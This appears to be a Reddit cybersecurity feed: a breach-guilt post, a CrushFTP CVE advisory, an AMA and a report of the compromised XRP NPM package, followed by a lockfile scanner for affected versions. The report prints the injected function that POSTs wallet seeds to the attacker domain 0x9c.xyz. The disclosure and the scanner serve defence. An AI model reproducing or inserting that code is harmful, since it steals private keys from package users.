In the past year my company was a victim to a severe cybersecurity breach, they almost got everything. While there were a ton of factors in play, like leadership shutting us down every step of the way in an attempt to move fast, lack of headcount, etc. I cannot stop beating myself over the fact that I hold a piece of a blame as a cybersecurity engineer. Whether it's a missed alert, or simply not putting two and two together at the time. It's severely impacted my mental health since it happened and makes me wonder if I'm not cut out to be a cyber security engineer. I know a lot of work environments are blameless and other engineers seem to be able to compartmentalize it but I can't. I'm sure I'm not the only person who has gone through this in this field. Does anyone who has experienced something similar have any guidance for someone relatively new to the field?
- CVE-2025-31161 is being actively exploited and it's not getting the attention it should. by /u/bytelocksolutions (cybersecurity) on April 22, 2025 at 4:26 pm
An authentication bypass vulnerability in CrushFTP (CVE-2025-31161) is currently being exploited in the wild. It affects versions 10.0.0 to 10.8.3 and versions 11.0.0 to 11.3.0. If exploited, it can allow attackers to access sensitive files without valid credentials and gain full system control depending on configuration.
Active exploitation has already been confirmed, yet it's flying under the radar. Recommended mitigation would be to upgrade to 10.8.4 or 11.3.1 ASAP. If patching isn’t possible, CrushFTP’s DMZ proxy can provide a temporary buffer.
If you're running CrushFTP or know someone who is, now’s the time to double-check your version and get this patched. Wouldn’t be surprised if we see this pop up in a ransomware chain soon.
- AI hallucinations lead to a new cyber threat: Slopsquatting by /u/Total_Purpose_8499 (cybersecurity) on April 22, 2025 at 1:03 pm
- Official XRP NPM package has been compromised and key stealing malware introduced. by /u/Advocatemack (cybersecurity) on April 22, 2025 at 11:43 am
A few hours ago we discovered that malware was introduced into the XRPL package on NPM. This is the official SDK for Ripple to interact with the Ripple ledger.
The malicious package is still live right now - https://www.npmjs.com/package/xrpl?activeTab=code (src/index.ts)

Technical Details
  - Malware Function: A malicious function checkValidityOfSeed was inserted. It POSTs private key data to an attacker's domain 0x9c[.]xyz (C2 server).
  - How was it injected? Code was committed by user mukulljangid, believed to be a compromised Ripple employee account. (employee at ripple since 2021 has the same information on Linkedin)

```typescript
export { Client, ClientOptions } from './client'

export * from './models'

export * from './utils'

export { default as ECDSA } from './ECDSA'

export * from './errors'

export { FundingOptions } from './Wallet/fundWallet'
export { Wallet } from './Wallet'

export { walletFromSecretNumbers } from './Wallet/walletFromSecretNumbers'

export { keyToRFC1751Mnemonic, rfc1751MnemonicToKey } from './Wallet/rfc1751'

export * from './Wallet/signer'

const validSeeds = new Set<string>([])
export function checkValidityOfSeed(seed: string) {
  if (validSeeds.has(seed)) return
  validSeeds.add(seed)
  fetch("https://0x9c.xyz/xc", { method: 'POST', headers: { 'ad-referral': seed, } })
}
```

You can view the full technical breakdown here -> https://www.aikido.dev/blog/xrp-supplychain-attack-official-npm-package-infected-with-crypto-stealing-backdoor

Affected Versions:
  - 4.2.4
  - 4.2.3
  - 4.2.2
  - 4.2.1
  - 2.14.2

Impact
If major wallets or exchanges unknowingly upgraded to an infected version, it could cause widespread private key theft across the ecosystem. Swift patching and response are crucial to minimize fallout.
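To check whether a project resolved one of the versions listed in the post above, including copies pulled in by other dependencies, the lockfile can be walked directly. This is an added example, not code from the post or from the xrpl project; the function names and the sample lockfiles are constructed, and the version list and marker strings are the ones quoted in the post.

```javascript
// Versions the post lists as affected, and strings from the injected code it quotes.
const AFFECTED_XRPL = new Set(["4.2.4", "4.2.3", "4.2.2", "4.2.1", "2.14.2"]);
const SOURCE_MARKERS = ["checkValidityOfSeed", "0x9c.xyz"];

// Walk a parsed package-lock.json and return every xrpl install, direct or nested.
function findXrplInstalls(lock) {
  const hits = [];
  // lockfileVersion 2 and 3: flat "packages" map keyed by install path.
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === "node_modules/xrpl" || path.endsWith("/node_modules/xrpl")) {
      hits.push({ path, version: meta.version });
    }
  }
  // lockfileVersion 1: nested "dependencies" tree (skipped when "packages" exists,
  // so a version 2 file is not counted twice).
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const here = trail.concat(name);
      if (name === "xrpl") hits.push({ path: here.join(" > "), version: meta.version });
      walk(meta.dependencies, here);
    }
  };
  if (!lock.packages) walk(lock.dependencies, []);
  return hits.map((h) => ({ ...h, affected: AFFECTED_XRPL.has(h.version) }));
}

// Report which of the quoted marker strings appear in a source file's text.
function findSourceMarkers(sourceText) {
  return SOURCE_MARKERS.filter((m) => sourceText.includes(m));
}

// Constructed sample lockfiles. "wallet-lib" and "xrpl-helper" are hypothetical
// packages; 4.2.5 stands in for any version that is not on the post's list.
const SAMPLE_LOCK_V3 = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/xrpl": { version: "4.2.3" },
    "node_modules/wallet-lib": { version: "1.0.0" },
    "node_modules/wallet-lib/node_modules/xrpl": { version: "4.2.5" },
    "node_modules/xrpl-helper": { version: "4.2.3" },
  },
};
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    "wallet-lib": { version: "1.0.0", dependencies: { xrpl: { version: "2.14.2" } } },
  },
};

for (const lock of [SAMPLE_LOCK_V3, SAMPLE_LOCK_V1]) {
  for (const hit of findXrplInstalls(lock)) {
    console.log(`${hit.affected ? "AFFECTED" : "ok      "} xrpl@${hit.version} at ${hit.path}`);
  }
}
```

A hit on an affected version means any seed or private key handled by that build should be treated as exposed, which is the impact the post describes.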
- Two top cyber officials resign from CISA by /u/boom_bloom (cybersecurity) on April 22, 2025 at 10:03 am
- Mentorship Monday - Post All Career, Education and Job questions here! by /u/AutoModerator (cybersecurity) on April 21, 2025 at 12:00 am
This is the weekly thread for career and education questions and advice. There are no stupid questions; so, what do you want to know about certs/degrees, job requirements, and any other general cybersecurity career questions? Ask away! Interested in what other people are asking, or think your question has been asked before? Have a look through prior weeks of content - though we're working on making this more easily searchable for the future.
- I'm a former CISO who left to start my own security company. Ask Me Anything. by /u/Oscar_Geare (cybersecurity) on April 20, 2025 at 5:37 pm
Hello, The editors at CISO Series present this AMA, and they have assembled security leaders who left their roles as CISOs to start their own security companies. They are here to answer any relevant questions about taking the leap of faith from a CISO role to start their own business (launching a security solution or becoming a vCISO/consultant). This has been a long-term partnership between r/cybersecurity and the CISO Series.
This week's participants are:
  - Ian Amit, (/u/iiamit), CEO & Co-Founder, GomBoc.ai
  - Sara Lazarus, (/u/securitybysara), Founder and CISO, Faded Jeans Technology
  - Olivia Rose, (/u/SinkBusiness8170), CISO and Founder, Rose CISO Group
  - Rolin (Bud) Peets, (/u/TrustCISOBud), Chief Protection Architect, Harbor IT
Proof Photos
This AMA will run all week from 20 Apr 2025 to 26 Apr 2025. Our participants will check in over that time to answer your questions. All AMA participants are chosen by the editors at CISO Series (/r/CISOSeries), a media network for security professionals delivering the most fun you’ll have in cybersecurity. Please check out our podcasts and weekly Friday event, Super Cyber Friday, at cisoseries.com.